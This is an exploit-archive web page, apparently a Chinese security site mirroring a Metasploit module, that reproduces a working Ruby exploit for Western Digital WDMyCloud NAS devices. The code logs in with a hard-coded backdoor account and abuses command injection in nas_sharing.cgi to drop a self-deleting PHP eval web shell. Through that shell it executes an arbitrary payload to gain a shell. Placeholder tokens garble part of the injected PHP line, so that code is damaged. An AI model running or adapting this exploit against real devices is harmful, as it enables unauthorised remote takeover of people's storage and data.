首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Western Digital WDMyCloud 'mydlinkBRionyg' Backdoor
来源:metasploit.com 作者:Bercegay 发布时间:2018-01-05  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Western Digital WDMyCloud 'mydlinkBRionyg' Backdoor",
      'Description'    => %q{
        This module exploits two issues. The first issue is that there is a hard 
        coded backdoor within WDMyCloud devices. Using this backdoor access we 
        can then reach buggy code which is vulnerable to command injection. A
        root shell will be spawned upon successful exploitation.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Bercegay', # Vulnerability Discovery
        ],
      'References'     =>
        [
          [ 'URL', 'https://gulftech.org/' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => '2018-01-03',
      'DefaultTarget'  => 0))
  end

  def check
      
      # We check for the presence of this vulnerability by requesting a default
      # system file and checking if the response code is 200.
      res = send_request_cgi({
        'method'   => 'POST',
        'uri'      => "/cgi-bin/nas_sharing.cgi",
        'vars_post' => {
          'cmd' => 7,
          'user' => "mydlinkBRionyg",
          'passwd' => Rex::Text.encode_base64("abc12345cba"),
          'path' => Rex::Text.encode_base64("/mnt/HD_a4/.!@#")
        }
      })

    if res and res.code == 200
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit

    # Make things a bit less obvious ...
    rnd = Rex::Text.rand_text_hex(rand(10) + 5)
    idx = rand(1000)

    print_status("Creating payload wrapper #{rnd}.php")

      res = send_request_cgi({
        'method'   => 'POST',
        'uri'      => "/cgi-bin/nas_sharing.cgi",
        'vars_post' => {
          'cmd' => 51,
          'user' => "mydlinkBRionyg",
          'passwd' => Rex::Text.encode_base64("abc12345cba"),
          'start' => "1",
          'count' => "1;echo '<?php unlink(__FILE__);@eval(
___FCKpd___0
REQUEST[#{idx}]);'>/var/www/#{rnd}.php;echo 1" } }) # We know the system supports PHP by default, so we go with a PHP payload print_status("Executing the selected payload via
___FCKpd___0
POST[#{idx}]") res = send_request_cgi({ 'method' => 'POST', 'uri' => "/#{rnd}.php", 'vars_post' => { idx => payload.encoded } }) end end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·D-Link DNS-320L 'mydlinkBRiony
·Iopsys Router - 'dhcp' Remote
·Multiple CPUs - 'Spectre' Info
·Kingsoft Antivirus/Internet Se
·Linksys WVBR0-25 User-Agent Co
·Xplico Remote Code Execution
·Samsung Internet Browser 6.2.0
·Linux Kernel < 4.4.0-83 / < 4.
·Huawei Router HG532 - Arbitrar
·Cambium ePMP1000 - 'get_chart'
·Cambium ePMP1000 - 'ping' Shel
·HP Mercury LoadRunner Agent ma
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved